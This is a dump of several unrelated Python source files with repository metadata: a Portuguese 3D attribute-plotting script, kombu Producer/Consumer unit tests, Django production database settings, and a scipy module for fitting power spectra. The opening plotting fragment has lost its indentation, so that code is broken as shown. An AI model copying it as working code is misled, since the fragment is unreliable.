linha=modelo.readline()
coeficientes=linha.split()
atk_amostras=[0]*1000
def_amostras=[0]*1000
vida_amostras=[0]*1000
for i in range(1000):
if (int(coeficientes[5])>=1):
            def_amostras[i]=np.random.randint(int(coeficientes[5]), int(coeficientes[6])+1)  # sample defense inclusively between the model's bounds
else:
def_amostras[i]=np.random.randint((int(coeficientes[5])+1), int(coeficientes[6])+2)-1
vida_amostras[i]=np.random.randint(int(coeficientes[3]), int(coeficientes[4])+1)
        # compute atk from the fitted linear model
atk_amostras[i]=((vida_amostras[i]-float(coeficientes[0])-(float(coeficientes[1])*def_amostras[i]))/float(coeficientes[2]))
return(def_amostras, atk_amostras, vida_amostras)
# collect the data
arquivo=open("../dados/vencedor.txt", "r")
vida_max, vida_min, def_max, def_min, atk_max, atk_min, numero_pontos=separador_atributos(arquivo)
frequencia_vida=frequencia_absoluta(vida ,vida_max, vida_min, numero_pontos)
frequencia_def=frequencia_absoluta(defesa ,def_max, def_min, numero_pontos)
frequencia_atk=frequencia_absoluta(ataque ,atk_max, atk_min, numero_pontos)
c=ajuste_cmap(frequencia_vida, frequencia_def, frequencia_atk, numero_pontos)
def_amostras, atk_amostras, vida_amostras=modelo_calculado()
# plotting
fig=plt.figure()
ax=fig.add_subplot(111, projection='3d')
ax.text2D(0.05, 0.95, "Dispersao & Concentração Atributos(Vencedores)", transform=ax.transAxes)
ax.scatter(defesa, ataque, vida, cmap="cool", c=c)
ax.plot_trisurf(def_amostras, atk_amostras, vida_amostras, color="red")
ax.set_xlabel("Defesa",fontsize=13)
ax.set_ylabel("Ataque",fontsize=13)
ax.set_zlabel("Vida",fontsize=13)
#ax.legend(loc=3, bbox_to_anchor=(-0.5, -0.1))
# output
ax.view_init(elev=30, azim=45)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores1.png", format='png')
ax.view_init(elev=30, azim=-20)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores2.png", format='png')
ax.view_init(elev=15, azim=-50)
fig=plt.gcf()
fig.savefig("dispersao_concentraca_atributos_entre_vencedores3.png", format='png')
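# Note on the sampling in modelo_calculado(): np.random.randint(low, high) excludes
# `high`, which is why the bounds above add +1 (or use the +1/+2 with -1 correction)
# so the fitted model's maximum coefficient remains reachable. Tiny illustration:
import numpy as np
_draws = sorted(set(int(np.random.randint(1, 4)) for _ in range(200)))
print(_draws)  # values come from {1, 2, 3}; 4 never appears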
|
Edumarek123/Machine_Learning
|
graficos/graficos_dispersao.py
|
graficos_dispersao.py
|
py
| 4,235 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
8267902176
|
from __future__ import annotations
import pickle
import sys
from collections import defaultdict
from unittest.mock import Mock, patch
import pytest
from kombu import Connection, Consumer, Exchange, Producer, Queue
from kombu.exceptions import MessageStateError
from kombu.utils import json
from kombu.utils.functional import ChannelPromise
from t.mocks import Transport
class test_Producer:
def setup(self):
self.exchange = Exchange('foo', 'direct')
self.connection = Connection(transport=Transport)
self.connection.connect()
assert self.connection.connection.connected
assert not self.exchange.is_bound
def test_repr(self):
p = Producer(self.connection)
assert repr(p)
def test_pickle(self):
chan = Mock()
producer = Producer(chan, serializer='pickle')
p2 = pickle.loads(pickle.dumps(producer))
assert p2.serializer == producer.serializer
def test_no_channel(self):
p = Producer(None)
assert not p._channel
@patch('kombu.messaging.maybe_declare')
def test_maybe_declare(self, maybe_declare):
p = self.connection.Producer()
q = Queue('foo')
p.maybe_declare(q)
maybe_declare.assert_called_with(q, p.channel, False)
@patch('kombu.common.maybe_declare')
def test_maybe_declare_when_entity_false(self, maybe_declare):
p = self.connection.Producer()
p.maybe_declare(None)
maybe_declare.assert_not_called()
def test_auto_declare(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, auto_declare=True)
# creates Exchange clone at bind
assert p.exchange is not self.exchange
assert p.exchange.is_bound
# auto_declare declares exchange'
assert 'exchange_declare' not in channel
p.publish('foo')
assert 'exchange_declare' in channel
def test_manual_declare(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, auto_declare=False)
assert p.exchange.is_bound
# auto_declare=False does not declare exchange
assert 'exchange_declare' not in channel
# p.declare() declares exchange')
p.declare()
assert 'exchange_declare' in channel
def test_prepare(self):
message = {'the quick brown fox': 'jumps over the lazy dog'}
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, headers={})
assert json.loads(m) == message
assert ctype == 'application/json'
assert cencoding == 'utf-8'
def test_prepare_compression(self):
message = {'the quick brown fox': 'jumps over the lazy dog'}
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
headers = {}
m, ctype, cencoding = p._prepare(message, compression='zlib',
headers=headers)
assert ctype == 'application/json'
assert cencoding == 'utf-8'
assert headers['compression'] == 'application/x-gzip'
import zlib
assert json.loads(zlib.decompress(m).decode('utf-8')) == message
def test_prepare_custom_content_type(self):
message = b'the quick brown fox'
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, content_type='custom')
assert m == message
assert ctype == 'custom'
assert cencoding == 'binary'
m, ctype, cencoding = p._prepare(message, content_type='custom',
content_encoding='alien')
assert m == message
assert ctype == 'custom'
assert cencoding == 'alien'
def test_prepare_is_already_unicode(self):
message = 'the quick brown fox'
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
m, ctype, cencoding = p._prepare(message, content_type='text/plain')
assert m == message.encode('utf-8')
assert ctype == 'text/plain'
assert cencoding == 'utf-8'
m, ctype, cencoding = p._prepare(message, content_type='text/plain',
content_encoding='utf-8')
assert m == message.encode('utf-8')
assert ctype == 'text/plain'
assert cencoding == 'utf-8'
def test_publish_with_Exchange_instance(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('hello', exchange=Exchange('foo'), delivery_mode='transient')
assert p._channel.basic_publish.call_args[1]['exchange'] == 'foo'
def test_publish_with_expiration(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('hello', exchange=Exchange('foo'), expiration=10)
properties = p._channel.prepare_message.call_args[0][5]
assert properties['expiration'] == '10000'
def test_publish_with_timeout(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
p.publish('test_timeout', exchange=Exchange('foo'), timeout=1)
timeout = p._channel.basic_publish.call_args[1]['timeout']
assert timeout == 1
def test_publish_with_reply_to(self):
p = self.connection.Producer()
p.channel = Mock()
p.channel.connection.client.declared_entities = set()
assert not p.exchange.name
p.publish('hello', exchange=Exchange('foo'), reply_to=Queue('foo'))
properties = p._channel.prepare_message.call_args[0][5]
assert properties['reply_to'] == 'foo'
def test_set_on_return(self):
chan = Mock()
chan.events = defaultdict(Mock)
p = Producer(ChannelPromise(lambda: chan), on_return='on_return')
p.channel
chan.events['basic_return'].add.assert_called_with('on_return')
def test_publish_retry_calls_ensure(self):
p = Producer(Mock())
p._connection = Mock()
p._connection.declared_entities = set()
ensure = p.connection.ensure = Mock()
p.publish('foo', exchange='foo', retry=True)
ensure.assert_called()
def test_publish_retry_with_declare(self):
p = self.connection.Producer()
p.maybe_declare = Mock()
p.connection.ensure = Mock()
ex = Exchange('foo')
p._publish('hello', 0, '', '', {}, {}, 'rk', 0, 0, ex, declare=[ex])
p.maybe_declare.assert_called_with(ex)
def test_revive_when_channel_is_connection(self):
p = self.connection.Producer()
p.exchange = Mock()
new_conn = Connection('memory://')
defchan = new_conn.default_channel
p.revive(new_conn)
assert p.channel is defchan
p.exchange.revive.assert_called_with(defchan)
def test_enter_exit(self):
p = self.connection.Producer()
p.release = Mock()
with p as x:
assert x is p
p.release.assert_called_with()
def test_connection_property_handles_AttributeError(self):
p = self.connection.Producer()
p.channel = object()
p.__connection__ = None
assert p.connection is None
def test_publish(self):
channel = self.connection.channel()
p = Producer(channel, self.exchange, serializer='json')
message = {'the quick brown fox': 'jumps over the lazy dog'}
ret = p.publish(message, routing_key='process')
assert 'prepare_message' in channel
assert 'basic_publish' in channel
m, exc, rkey = ret
assert json.loads(m['body']) == message
assert m['content_type'] == 'application/json'
assert m['content_encoding'] == 'utf-8'
assert m['priority'] == 0
assert m['properties']['delivery_mode'] == 2
assert exc == p.exchange.name
assert rkey == 'process'
def test_no_exchange(self):
chan = self.connection.channel()
p = Producer(chan)
assert not p.exchange.name
def test_revive(self):
chan = self.connection.channel()
p = Producer(chan)
chan2 = self.connection.channel()
p.revive(chan2)
assert p.channel is chan2
assert p.exchange.channel is chan2
def test_on_return(self):
chan = self.connection.channel()
def on_return(exception, exchange, routing_key, message):
pass
p = Producer(chan, on_return=on_return)
assert on_return in chan.events['basic_return']
assert p.on_return
class test_Consumer:
def setup(self):
self.connection = Connection(transport=Transport)
self.connection.connect()
assert self.connection.connection.connected
self.exchange = Exchange('foo', 'direct')
def test_accept(self):
a = Consumer(self.connection)
assert a.accept is None
b = Consumer(self.connection, accept=['json', 'pickle'])
assert b.accept == {
'application/json', 'application/x-python-serialize',
}
c = Consumer(self.connection, accept=b.accept)
assert b.accept == c.accept
def test_enter_exit_cancel_raises(self):
c = Consumer(self.connection)
c.cancel = Mock(name='Consumer.cancel')
c.cancel.side_effect = KeyError('foo')
with c:
pass
c.cancel.assert_called_with()
def test_enter_exit_cancel_not_called_on_connection_error(self):
c = Consumer(self.connection)
c.cancel = Mock(name='Consumer.cancel')
assert self.connection.connection_errors
with pytest.raises(self.connection.connection_errors[0]):
with c:
raise self.connection.connection_errors[0]()
c.cancel.assert_not_called()
def test_receive_callback_accept(self):
message = Mock(name='Message')
message.errors = []
callback = Mock(name='on_message')
c = Consumer(self.connection, accept=['json'], on_message=callback)
c.on_decode_error = None
c.channel = Mock(name='channel')
c.channel.message_to_python = None
c._receive_callback(message)
callback.assert_called_with(message)
assert message.accept == c.accept
def test_accept__content_disallowed(self):
conn = Connection('memory://')
q = Queue('foo', exchange=self.exchange)
p = conn.Producer()
p.publish(
{'complex': object()},
declare=[q], exchange=self.exchange, serializer='pickle',
)
callback = Mock(name='callback')
with conn.Consumer(queues=[q], callbacks=[callback]) as consumer:
with pytest.raises(consumer.ContentDisallowed):
conn.drain_events(timeout=1)
callback.assert_not_called()
def test_accept__content_allowed(self):
conn = Connection('memory://')
q = Queue('foo', exchange=self.exchange)
p = conn.Producer()
p.publish(
{'complex': object()},
declare=[q], exchange=self.exchange, serializer='pickle',
)
callback = Mock(name='callback')
with conn.Consumer(queues=[q], accept=['pickle'],
callbacks=[callback]):
conn.drain_events(timeout=1)
callback.assert_called()
body, message = callback.call_args[0]
assert body['complex']
def test_set_no_channel(self):
c = Consumer(None)
assert c.channel is None
c.revive(Mock())
assert c.channel
def test_set_no_ack(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True, no_ack=True)
assert consumer.no_ack
def test_add_queue_when_auto_declare(self):
consumer = self.connection.Consumer(auto_declare=True)
q = Mock()
q.return_value = q
consumer.add_queue(q)
assert q in consumer.queues
q.declare.assert_called_with()
def test_add_queue_when_not_auto_declare(self):
consumer = self.connection.Consumer(auto_declare=False)
q = Mock()
q.return_value = q
consumer.add_queue(q)
assert q in consumer.queues
assert not q.declare.call_count
def test_consume_without_queues_returns(self):
consumer = self.connection.Consumer()
consumer.queues[:] = []
assert consumer.consume() is None
def test_consuming_from(self):
consumer = self.connection.Consumer()
consumer.queues[:] = [Queue('a'), Queue('b'), Queue('d')]
consumer._active_tags = {'a': 1, 'b': 2}
assert not consumer.consuming_from(Queue('c'))
assert not consumer.consuming_from('c')
assert not consumer.consuming_from(Queue('d'))
assert not consumer.consuming_from('d')
assert consumer.consuming_from(Queue('a'))
assert consumer.consuming_from(Queue('b'))
assert consumer.consuming_from('b')
def test_receive_callback_without_m2p(self):
channel = self.connection.channel()
c = channel.Consumer()
m2p = getattr(channel, 'message_to_python')
channel.message_to_python = None
try:
message = Mock()
message.errors = []
message.decode.return_value = 'Hello'
recv = c.receive = Mock()
c._receive_callback(message)
recv.assert_called_with('Hello', message)
finally:
channel.message_to_python = m2p
def test_receive_callback__message_errors(self):
channel = self.connection.channel()
channel.message_to_python = None
c = channel.Consumer()
message = Mock()
try:
raise KeyError('foo')
except KeyError:
message.errors = [sys.exc_info()]
message._reraise_error.side_effect = KeyError()
with pytest.raises(KeyError):
c._receive_callback(message)
def test_set_callbacks(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
callbacks = [lambda x, y: x,
lambda x, y: x]
consumer = Consumer(channel, queue, auto_declare=True,
callbacks=callbacks)
assert consumer.callbacks == callbacks
def test_auto_declare(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.consume()
consumer.consume() # twice is a noop
assert consumer.queues[0] is not queue
assert consumer.queues[0].is_bound
assert consumer.queues[0].exchange.is_bound
assert consumer.queues[0].exchange is not self.exchange
for meth in ('exchange_declare',
'queue_declare',
'queue_bind',
'basic_consume'):
assert meth in channel
assert channel.called.count('basic_consume') == 1
assert consumer._active_tags
consumer.cancel_by_queue(queue.name)
consumer.cancel_by_queue(queue.name)
assert not consumer._active_tags
def test_consumer_tag_prefix(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, tag_prefix='consumer_')
consumer.consume()
assert consumer._active_tags[queue.name].startswith('consumer_')
def test_manual_declare(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=False)
assert consumer.queues[0] is not queue
assert consumer.queues[0].is_bound
assert consumer.queues[0].exchange.is_bound
assert consumer.queues[0].exchange is not self.exchange
for meth in ('exchange_declare',
'queue_declare',
'basic_consume'):
assert meth not in channel
consumer.declare()
for meth in ('exchange_declare',
'queue_declare',
'queue_bind'):
assert meth in channel
assert 'basic_consume' not in channel
consumer.consume()
assert 'basic_consume' in channel
def test_consume__cancel(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.consume()
consumer.cancel()
assert 'basic_cancel' in channel
assert not consumer._active_tags
def test___enter____exit__(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
context = consumer.__enter__()
assert context is consumer
assert consumer._active_tags
res = consumer.__exit__(None, None, None)
assert not res
assert 'basic_cancel' in channel
assert not consumer._active_tags
def test_flow(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.flow(False)
assert 'flow' in channel
def test_qos(self):
channel = self.connection.channel()
queue = Queue('qname', self.exchange, 'rkey')
consumer = Consumer(channel, queue, auto_declare=True)
consumer.qos(30, 10, False)
assert 'basic_qos' in channel
def test_purge(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
b2 = Queue('qname2', self.exchange, 'rkey')
b3 = Queue('qname3', self.exchange, 'rkey')
b4 = Queue('qname4', self.exchange, 'rkey')
consumer = Consumer(channel, [b1, b2, b3, b4], auto_declare=True)
consumer.purge()
assert channel.called.count('queue_purge') == 4
def test_multiple_queues(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
b2 = Queue('qname2', self.exchange, 'rkey')
b3 = Queue('qname3', self.exchange, 'rkey')
b4 = Queue('qname4', self.exchange, 'rkey')
consumer = Consumer(channel, [b1, b2, b3, b4])
consumer.consume()
assert channel.called.count('exchange_declare') == 4
assert channel.called.count('queue_declare') == 4
assert channel.called.count('queue_bind') == 4
assert channel.called.count('basic_consume') == 4
assert len(consumer._active_tags) == 4
consumer.cancel()
assert channel.called.count('basic_cancel') == 4
assert not len(consumer._active_tags)
def test_receive_callback(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
received = []
def callback(message_data, message):
received.append(message_data)
message.ack()
message.payload # trigger cache
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_ack' in channel
assert 'message_to_python' in channel
assert received[0] == {'foo': 'bar'}
def test_basic_ack_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.ack()
message.ack()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
def test_basic_reject(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.reject()
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject' in channel
def test_basic_reject_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.reject()
message.reject()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject' in channel
def test_basic_reject__requeue(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.requeue()
consumer.register_callback(callback)
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject:requeue' in channel
def test_basic_reject__requeue_twice(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
def callback(message_data, message):
message.requeue()
message.requeue()
consumer.register_callback(callback)
with pytest.raises(MessageStateError):
consumer._receive_callback({'foo': 'bar'})
assert 'basic_reject:requeue' in channel
def test_receive_without_callbacks_raises(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
with pytest.raises(NotImplementedError):
consumer.receive(1, 2)
def test_decode_error(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
consumer.channel.throw_decode_error = True
with pytest.raises(ValueError):
consumer._receive_callback({'foo': 'bar'})
def test_on_decode_error_callback(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
thrown = []
def on_decode_error(msg, exc):
thrown.append((msg.body, exc))
consumer = Consumer(channel, [b1], on_decode_error=on_decode_error)
consumer.channel.throw_decode_error = True
consumer._receive_callback({'foo': 'bar'})
assert thrown
m, exc = thrown[0]
assert json.loads(m) == {'foo': 'bar'}
assert isinstance(exc, ValueError)
def test_recover(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
consumer.recover()
assert 'basic_recover' in channel
def test_revive(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
consumer = Consumer(channel, [b1])
channel2 = self.connection.channel()
consumer.revive(channel2)
assert consumer.channel is channel2
assert consumer.queues[0].channel is channel2
assert consumer.queues[0].exchange.channel is channel2
def test_revive__with_prefetch_count(self):
channel = Mock(name='channel')
b1 = Queue('qname1', self.exchange, 'rkey')
Consumer(channel, [b1], prefetch_count=14)
channel.basic_qos.assert_called_with(0, 14, False)
def test__repr__(self):
channel = self.connection.channel()
b1 = Queue('qname1', self.exchange, 'rkey')
assert repr(Consumer(channel, [b1]))
def test_connection_property_handles_AttributeError(self):
p = self.connection.Consumer()
p.channel = object()
assert p.connection is None
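# Hedged standalone sketch (not one of the original test cases): the same
# publish/consume round trip the accept tests above exercise, run against the
# in-memory transport so no broker is needed. The 'demo' queue/exchange names
# are illustrative only.
if __name__ == '__main__':
    from kombu import Connection, Exchange, Queue

    received = []

    def on_message(body, message):
        received.append(body)
        message.ack()

    with Connection('memory://') as conn:
        demo_queue = Queue('demo', Exchange('demo'), 'demo')
        with conn.Producer() as producer:
            producer.publish({'hello': 'world'}, exchange=demo_queue.exchange,
                             routing_key='demo', declare=[demo_queue],
                             serializer='json')
        with conn.Consumer(queues=[demo_queue], accept=['json'],
                           callbacks=[on_message]):
            conn.drain_events(timeout=1)
    print(received)  # expected: [{'hello': 'world'}]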
|
celery/kombu
|
t/unit/test_messaging.py
|
test_messaging.py
|
py
| 24,481 |
python
|
en
|
code
| 2,643 |
github-code
|
6
|
6824520762
|
import os
from settings.common_settings import *
DEBUG = True
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.getenv('DB_NAME'),
'USER': os.getenv('DB_USER'),
'PASSWORD': os.getenv('DB_PASSWORD'),
'HOST': os.getenv('DB_HOST'),
'PORT': os.getenv('DB_PORT'),
'OPTIONS': {
'client_encoding': 'UTF8',
},
}
}
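# Hedged example (not from the original repository) of the environment
# variables this settings module reads; the values below are placeholders,
# typically supplied via the container environment or an .env file:
#   DB_NAME=app_db
#   DB_USER=app_user
#   DB_PASSWORD=change-me
#   DB_HOST=db
#   DB_PORT=5432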
STATIC_URL = '/static/static/'
MEDIA_URL = '/static/media/'
STATIC_ROOT = '/vol/web/static'
MEDIA_ROOT = '/vol/web/media'
|
Baronchibuikem/DhangoGraphenePratice
|
server/settings/production_settings.py
|
production_settings.py
|
py
| 618 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34473798674
|
import numpy as np
from scipy.optimize import curve_fit
import sys
def fit_DD(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
    Fit P_DD(k, mu, lambda) with a given function f:
      P_DD(k, mu, lambda) = P_DD(k, mu, lambda=0)*f(lambda, *params)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu (int): mu index
f: fitting function f(lambda, *params)
      fit: dictionary for results
Returns:
fit (dict)
fit['lambda'] (array): lambda[ilambda]
fit['PDD_params'] (array): best fitting *params
      fit['PDD'] (array): best fitting PDD[ilambda]
"""
x = d['lambda'][:ilambda_max]
y = d['summary']['PDD'][ik, imu, :ilambda_max]/d['summary']['PDD0'][ik, imu]
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount - 1)
# fitting
try:
popt, pcov = curve_fit(f, x, y, p0=p0)
except RuntimeError:
return None
if fit is None:
fit = {}
fit['PDD_amp'] = d['summary']['PDD0'][ik, imu]
fit['PDD_params'] = popt
fit['lambda'] = x
fit['PDD'] = d['summary']['PDD0'][ik, imu]*f(x, *popt)
return fit
def fit_DU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
    Fit P_DU(k, mu, lambda) with a given function f:
      P_DU(k, mu, lambda) = A*lambda*f(lambda, ...)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
      imu (int): mu index
      f (func): fitting function f(lambda, *params)
      fit (dict): dictionary for results
"""
def ff(x, A, *params):
return A*x*f(x, *params)
x = d['lambda'][:ilambda_max]
y = d['summary']['PDU'][ik, imu, :ilambda_max]
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount)
else:
p0 = [0,] + p0
p0[0] = y[10]/x[10]
# fitting
try:
popt, pcov = curve_fit(ff, x, y, p0=p0)
except RuntimeError:
sys.stderr.write('Warning: unable to fit DU with %s; ik=%d imu=%d\n' %
(f.__name__, ik, imu))
return None
if fit is None:
fit = {}
fit['PDU_amp'] = popt[0]
fit['PDU_params'] = popt[1:]
fit['lambda'] = x
fit['PDU'] = ff(x, *popt)
return fit
def fit_UU(d, ik, imu, f, fit=None, p0=None, ilambda_max=None):
"""
    Fit P_UU(k, mu, lambda) with a given function f:
      P_UU(k, mu, lambda) = A*lambda**2*f(lambda, ...)
Args:
d (dict): lambda data returned by load_lambda()
ik (int): k index
imu (int): mu index
f (func): fitting function f(lambda, *params)
fit (dict): dictionary for the result
"""
def ff(x, A, *params):
return A*x**2*f(x, *params)
x = d['lambda'][:ilambda_max]
y = d['summary']['PUU'][ik, imu, :ilambda_max]
# remove nans
idx = np.isfinite(y)
x = x[idx]
y = y[idx]
# initial guess
if p0 is None:
p0 = [0,]*(f.__code__.co_argcount)
else:
p0 = [0.0,] + p0
p0[0] = y[10]/x[10]**2
assert(len(p0) == f.__code__.co_argcount)
# fitting
try:
popt, pcov = curve_fit(ff, x, y, p0=p0)
except RuntimeError:
sys.stderr.write('Warning: unable to fit UU with %s; ik=%d imu=%d\n' %
(f.__name__, ik, imu))
return None
if fit is None:
fit = {}
fit['PUU_amp'] = popt[0]
fit['PUU_params'] = popt[1:]
fit['lambda'] = x
fit['PUU'] = ff(x, *popt)
return fit
def _nans(shape):
a = np.empty(shape)
a[:] = np.nan
return a
def fit_lambda(d, ik, imu, f, *,
kind=('DD', 'DU', 'UU'),
p0=None, ilambda_max=None):
"""
Fit lambda plot with a fitting function f for a pair of k, mu
P_DD(k, mu, lambda) = P_DD(k, mu, lambda=0)*f(lambda)
P_DU(k, mu, lambda) = P_DU_amp*lambda*f(lambda)
      P_UU(k, mu, lambda) = P_UU_amp*lambda**2*f(lambda)
Args:
      d (dict): lambda data loaded by load_lambda
ik (array-like): index of k
imu (array-like): index of mu
f (func): fitting function f(lambda, fitting parameters ...)
kind (list): fitting P_**, subset of ('DD', 'DU', 'UU')
p0 (list): initial parameter guess
ik, imu can be:
integer, 1D array, or 2D array.
Result:
fit (dict)
fit['PDD'] (np.array): fitted P_DD
fit['PDU'] (np.array): fitted P_DU
      fit['PUU'] (np.array): fitted P_UU
fit['PDD_params']: best fitting parameters in f
fit['PDU_params']: best fitting parameters in f
fit['PUU_params']: best fitting parameters in f
fit['PDU_amp']: amplitude A in PDU = A*lambda*f(lambda)
      fit['PUU_amp']: amplitude A in PUU = A*lambda**2*f(lambda)
None if fitting failed
"""
# single pair of (ik, imu)
if isinstance(ik, int) and isinstance(imu, int):
fit = {}
if np.isnan(d['summary']['PDD'][ik, imu, 0]):
return None
if 'DD' in kind:
fit_DD(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
if 'DU' in kind:
fit_DU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
if 'UU' in kind:
fit_UU(d, ik, imu, f, fit, p0=p0, ilambda_max=ilambda_max)
return fit
# Convert ik, imu to np.array if they are array-like
if type(ik) != np.ndarray:
ik = np.array(ik, ndmin=1)
if len(ik.shape) == 1:
if type(imu) != np.ndarray:
imu = np.array(imu, ndmin=1)
if len(imu.shape) != 1:
            raise TypeError('If ik is a 1D array, '
                            'imu must also be a 1D array: '
'imu.shape {}'.format(imu.shape))
nk = len(ik)
nmu = len(imu)
# Convert ik and imu to 2D arrays by repeating same row/column
ik = ik.reshape((nk, 1)).repeat(nmu, axis=1)
imu = imu.reshape((1, nmu)).repeat(nk, axis=0)
# 2D arrays of ik imu
if ik.shape != imu.shape:
raise TypeError('2D arrays ik imu must have the same shape: '
'{} != {}'.format(ik.shape, imu.shape))
nk = ik.shape[0]
nmu = ik.shape[1]
nparam = f.__code__.co_argcount
    # number of free parameters for f + linear RSD amplitude
nlambda = len(d['lambda'][:ilambda_max])
# Arrays for fitting results
if 'DD' in kind:
PDD_params = _nans((nk, nmu, nparam))
PDD = _nans((nk, nmu, nlambda))
if 'DU' in kind:
PDU_params = _nans((nk, nmu, nparam))
PDU = _nans((nk, nmu, nlambda))
if 'UU' in kind:
PUU_params = _nans((nk, nmu, nparam))
PUU = _nans((nk, nmu, nlambda))
for i in range(nk):
for j in range(nmu):
ik_ij = ik[i, j]
imu_ij = imu[i, j]
if 'DD' in kind:
fit = fit_DD(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PDD_params[i, j, 0] = fit['PDD_amp']
PDD_params[i, j, 1:] = fit['PDD_params']
PDD[i, j, :] = fit['PDD']
if 'DU' in kind:
fit = fit_DU(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PDU_params[i, j, 0] = fit['PDU_amp']
PDU_params[i, j, 1:] = fit['PDU_params']
PDU[i, j, :] = fit['PDU']
if 'UU' in kind:
fit = fit_UU(d, ik_ij, imu_ij, f, p0=p0,
ilambda_max=ilambda_max)
if fit:
PUU_params[i, j, 0] = fit['PUU_amp']
PUU_params[i, j, 1:] = fit['PUU_params']
PUU[i, j, :] = fit['PUU']
fit = {}
fit['ik'] = ik
fit['imu'] = imu
fit['lambda'] = d['lambda'][:ilambda_max]
if 'DD' in kind:
fit['PDD'] = PDD
fit['PDD_params'] = PDD_params
if 'DU' in kind:
fit['PDU'] = PDU
fit['PDU_params'] = PDU_params
if 'UU' in kind:
fit['PUU'] = PUU
fit['PUU_params'] = PUU_params
return fit
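# Hedged usage sketch (not part of the original module): build a tiny synthetic
# `d` dict with the keys the fitting routines expect and fit a Gaussian damping
# function. The grid sizes and the 0.8/0.6 amplitudes below are arbitrary
# illustration values, not anything prescribed by the library.
if __name__ == '__main__':
    lam = np.linspace(0.0, 2.0, 21)
    nk, nmu = 2, 2
    damping = np.exp(-0.5*lam**2)
    PDD0 = np.ones((nk, nmu))
    PDD = np.ones((nk, nmu, 1))*damping[None, None, :]
    PDU = 0.8*np.ones((nk, nmu, 1))*(lam*damping)[None, None, :]
    PUU = 0.6*np.ones((nk, nmu, 1))*(lam**2*damping)[None, None, :]
    d = {'lambda': lam,
         'summary': {'PDD': PDD, 'PDD0': PDD0, 'PDU': PDU, 'PUU': PUU}}

    def gauss(x, a):
        # one-parameter damping model: f(lambda, a) = exp(-a*lambda**2)
        return np.exp(-a*x*x)

    result = fit_lambda(d, 0, 0, gauss)
    # expect roughly a ~ 0.5, PDU_amp ~ 0.8, PUU_amp ~ 0.6
    print(result['PDD_params'], result['PDU_amp'], result['PUU_amp'])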
|
junkoda/lambda
|
